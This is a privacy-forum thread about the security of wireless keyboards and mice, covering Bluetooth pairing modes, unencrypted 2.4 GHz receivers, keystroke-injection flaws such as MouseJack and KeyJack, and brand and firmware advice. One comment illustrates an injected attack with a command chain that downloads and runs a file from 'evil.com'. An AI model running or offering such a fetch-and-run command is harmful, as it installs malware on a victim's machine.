Privacy has become a very important issue in modern society, with companies and governments constantly abusing their power, more and more people are waking up to the importance of digital privacy.
In this community everyone is welcome to post links and discuss topics related to privacy.
[Matrix/Element]Dead
much thanks to @gary_host_laptop for the logo design :)
Bluetooth data transmission is encrypted. Initialization typically happens only through the press of a physical button.
I assume you're using wireless devices of the same manufacturer, that uses an alternative that is not Bluetooth, and has automatic pairing without a safeguard.
This is not about wireless primarily. Use a decent product and standard and you don't have that issue.
Bluetooth isn't guaranteed to be safe either. It can be safe, with the proper configuration (which depends on the manufacturer, you usually can't change it), but it can also be very vulnerable
How so? You mean which encryption is being used? The Bluetooth demanded minimum is not enough?
Earlier this year i was reading the bluetooth specification (of course not all of it, certain parts only, it's quite long) and I remember that there are pairing modes which can't guarantee that the connection is secure, because the method does not make sure that the connection cannot be eavesdropped by an attacker to obtain the keys that'll be used.
Of course better devices will already be paired in the factory.. but that's not all of them, and how do you even verify that it has been paired in the factory, or it just randomly pairs with whatever it finds in pairing mode? Or how do you verify that they correctly verify the incoming packets?
But for the user-pairable ones, the security of the connection depends a lot on what pairing mode will you use, there's a huge difference if you just press a button and done, or when you can somehow input codes on both devices.
And it's not even just about whether you trust your devices to follow the bluetooth specifications correctly. Bluetooth had many different security mechanisms over the years, for the different bluetooth versions, many of which don't protect against certain types of attacks and situations, or which are just plainly insecure.
But they still exist and they are still used by some (or more) manufacturers who just don't care.
Also keep in mind that for compatibility many Bluetooth devices also support communication with older versioned devices.
This stackoverflow post tries to summarize a part of the evolution of bluetooth security. Hopefully with it the above will make sense
But then bluetooth vulnerabilities are also not unkown, both software and hardware based.
This strongly depends on the brands you use. Unencrypted, automatically re-pairing devices are not normal, it just sounds like you and your coworker bought devices from questionable brands. Logitech keyboards and dongles encrypt key presses, for example. You do need to regularly check for firmware updates for both your keyboard and the receiver (sometimes vulnerabilities are found and despite the spyware Logitech wants to install onto your computer, these updates aren't done automatically) but they're generally quite safe.
Something perhaps more worrying: unencrypted keyboards will also let anyone in range inject keystrokes. A simple win+r, powershell.exe, wget http://evil.com, ./evil.exe could infect your computer if you look away for just five seconds.
These pages show how various brands deal with such security bugs: KeyJack Affected Devices, MouseJack Affected Devices. TL;DR, don't use anything from Microsoft or AliExpress/Amazon Basics and update your firmware.
Thanks. For what kind of specs I should be looking when byuing a wireless product? What key words I should be looking for?
"Encryption" most importantly, preferably encryption checked out by third parties. It's no guarantee, but firmware updates for peripherals such as keyboards and receivers are usually a good sign; most hardware can use a firmware update down the line, but only the shitty brands don't make any updates after release. The lists I linked also show how companies responded to flaws in their wireless communications: no response is a bad sign, if there is a response that's usually a good sign (but may come with instructions like "customer should buy a new, up to date receiver").
Wired keyboards are also fine, of course, if you don't want to deal with security risks.
If you do want to go wireless, I would personally look at Logitech's offerings, in my experience their hardware is usually quite good and they do eventually patch their bugs (unlike, say Microsoft).
I'll probably going to update to wired. It has all of the advanteges except portability. The only reason I got that wireless keyboard was that I needed something small, chaeap and portable.
Hmm, do you want a keyboard with firmware updates that encrypts keybresses....
Or simply use USB?...
USB works great but you need a lot of extension cables to control your media center PC from the couch, and they're usually not exactly up to spec either.
I don't use a wireless keyboard, I do have a wireless mouse for travelling, though. Sometimes wireless makes sense, sometimes it doesn't.
Still using a PS/2 keyboard from like 2007. Checkmate.
I guess being old fashioned and sticking with my model M has it's advantages.
The guy sitting next to you hates you
All my passwords are random characters and I just copy/paste out of bitwarden. Can't leak that with a wireless keyboard.
Does that work for logging in?
I only log in on my own devices. On devices that I don't own, I change the password afterwards.
I think they mean logging into the device itself. Like, if you have a computer at work with a work login, etc.
Fair enough, that is a bit complicated. Thank you for clarification.
So what you're saying is that the password to get all your passwords from the cloud is typed onto a wireless keyboard?
My Wireless keyboard is a Keychron. It doesn't have a dedicated adapter, it'll connect to any device with Bluetooth capabilities. From what I've seen of how it works, is that it can store up to 3 device signatures to automatically connect to (you can choose which of the three is active). What I assume it's storing is the MAC address which I thought is unique to the device.
do you have one with 2.4ghz receiver?
like one of the plug and connect; no pairing required ones?
yeah these are garbage...
It was indeed a 2.4 Ghz one.
It is also problematic that you can send keypresses to the other person, especially since she was only using the receiver for a mouse.
Used to work in an office where dell's wireless peripherals would every once in a while randomly enter pairing mode and connect to someone else's machine... often to the humor of those nearby. Their tech was based on Logitech's older Unifying stuff but I have no idea what they were thinking when adding auto pairing to it.
For wireless peripherals do research beforehand if this is something you're worried about. Personally I stick with newer logitech stuff, which encrypt the connection and don't start auto-pairing when peripherals are switched on
Lol my closest neighbor is half a mile away checkmate
Pay no attention to that unmarked van
Can-tenna yaggi omni bi-focal ... satellite dish made into a bigass reflector collector. I'll get you from well down the street.
I don't use wireless because batteries suck to deal with. I learned that in my teens with a wireless headset, wireless mouse and wireless keyboard!
I don't know how old you are, but I used to think the same thing in my teens, however nowadays wireless nice last pretty long on a single charge. Mine lasts about 3 months, and in endurance mode like half a year.
modern (bt) devices usually have a built in battery that can be recharged via cable (or use the cable to connect the device to it's computer), so that issue is off the table, at least for better devices.
Don't use cheap ones with white label components. Sender and receiver having a shared key would resolve this.
Shit my current computer only works with wireless keyboard...Although I guess I could get a regular one and use one of the USB ports. Good to know, thanks.
If the keyboard is connected via Bluetooth, it should be quite secure.
It's connected via wireless USB.
According to Wikipedia, wireless USB should be secure too: "The goal of the specification was to preserve the functional model of USB, based on intelligent hosts and behaviorally simple devices, while allowing it to operate in a wireless environment and keeping security on a par with the levels offered by traditional wired systems."
Phew. Thanks for doing the research and sharing the info
People use wireless keyboards?
yeah, a bluetooth one and it's great.
Just another item to charge it or replace the battery.
Frankly speaking, I tend to use wired if I can. I'm just one of those unlucky folks where whenever I'm in a hurry or something's urgent. Things I use tend to be low on battery, ink, supply, gas, etcetera at that exact moment.
Either I'm unlucky or I have a tendency to forget to monitor things that need refilling.
thank you